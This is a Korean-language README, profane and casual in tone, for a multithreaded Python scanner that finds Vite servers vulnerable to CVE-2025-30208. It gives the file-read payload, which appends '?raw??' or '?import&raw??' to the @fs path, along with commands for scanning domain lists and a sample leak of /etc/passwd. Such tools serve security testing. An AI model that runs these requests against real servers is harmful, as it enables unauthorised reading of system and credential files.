
CVE-2025-30208 ViteVulnScanner
Yo, 이건 keklick1337이 만든 멀티스레드 Python 스크립트로, Vite에서 CVE-2025-30208에 취약한 도메인을 찾아내는 거야. 기본적으로 @fs 엔드포인트에 ?raw?? 또는 ?import&raw??를 붙여서 임의 파일을 빼낼 수 있는지 확인해 — /etc/passwd 유출 같은 쩌는 것들 말이지. 멍청한 응답에 시간 낭비하지 않도록 똑똑한 false-positive 필터링도 있고, 결과 출력 방식을 조정할 수 있는 옵션도 있어.
<head>랑 <body> 있는 응답은 걸러버려, 진짜처럼 보이지 않으면.sourcemappingurl 또는 export default를 찾아서 제대로 된 결과인지 확인해.results_good.txt, results_maybe_good.txt, results_bad.txt).-u 옵션으로 URL도 같이 넣을 수 있어.requestsurllib3git clone https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner.git
cd CVE-2025-30208-ViteVulnScanner
pip install requests urllib3
path_list.txt: 확인할 경로들을 한 줄에 하나씩 (예: /etc/passwd).domains.txt: 때릴 도메인들을 한 줄에 하나씩 (예: example.com).이렇게 실행해:
python3 CVE-2025-30208.py <domains_file> [options]
<domains_file>: 도메인 목록 파일 (파일 없으면 스캔 없음, 당연하지).-t, --threads: 풀어놓을 스레드 수 (기본값: 10).-p, --protocol: http 또는 https 강제, 생략하면 둘 다.-u, --urls: 취약한 URL을 출력에 같이 넣어.-o, --output: 파일 기본 이름 (기본값: results).-f, --format: txt는 분리된 파일들, jsonl은 하나의 큰 파일 (기본값: txt).python3 CVE-2025-30208.py domains.txt
python3 CVE-2025-30208.py domains.txt -t 20 -u -f jsonl
python3 CVE-2025-30208.py domains.txt -t 5 -p https
-f txt)results_good.txt: 확실하게 개박살난 놈들 (sourcemappingurl 또는 export default 포함).results_maybe_good.txt: 취약할 수도 있는데, 결정적 증거는 없는 놈들.results_bad.txt: 깨끗함, 문제없음.-u 추가하면 URL이 탭(\t)으로 붙어.results_good.txt with -u:example.com https://example.com/@fs/etc/passwd?raw??
-f jsonl)results_good.jsonl, results_maybe_good.jsonl, results_bad.jsonl.domain: 스캔한 도메인.status: VULNERABLE, MAYBE VULNERABLE, 또는 BAD.url (-u 쓸 때): 박살난 위치.response: 서버가 토해낸 응답.results_good.jsonl:{"domain": "example.com", "status": "VULNERABLE", "url": "https://example.com/@fs/etc/passwd?raw??", "response": "root:x:0:0:root:/root:/bin/bash"}
/1e4c911a3fd2244596863ddbfa6f3600/7970621079b41658dcd6c205640b3602/fake)를 때려봐.<head>랑 <body>가 있으면 걸러 — 서버가 그냥 병신같이 구는 거야.path_list.txt에 있는 모든 경로를 @fs/<path>?raw?? 및 ?import&raw??와 함께 시도해.<head>와 <body> 있음? 그런 건 씹어.sourcemappingurl 또는 export default 있음? 빵, GOOD.MAYBE_GOOD.BAD.urllib3.disable_warnings()), 인증서 관련해서 징징대지 않아. 밖에서 조심해.path_list.txt를 조정해 — 민감한 파일들이 진짜 중요하지.잘 들어: 이건 교육 목적으로만 쓰는 거야, 친구. 이거 쓰다가 뭔가 조지거나, 걸리거나, 누구 뒤통수 때려도 난 책임 안 져. 배우는 용도로 쓰지, 개새끼짓 하라고 있는 게 아니야. 모든 위험은 네 몫이야, 씨발 — 난 그냥 코드 던져놓는 사람일 뿐이야.
아이디어 있어? 버그 찾았어? 이슈나 풀 리퀘스트로 연락해. 오탐 잡을 방법이 더 있거나 쩌는 기능이 생각나? 이 짐승을 더욱 쩔게 만들어 보자고.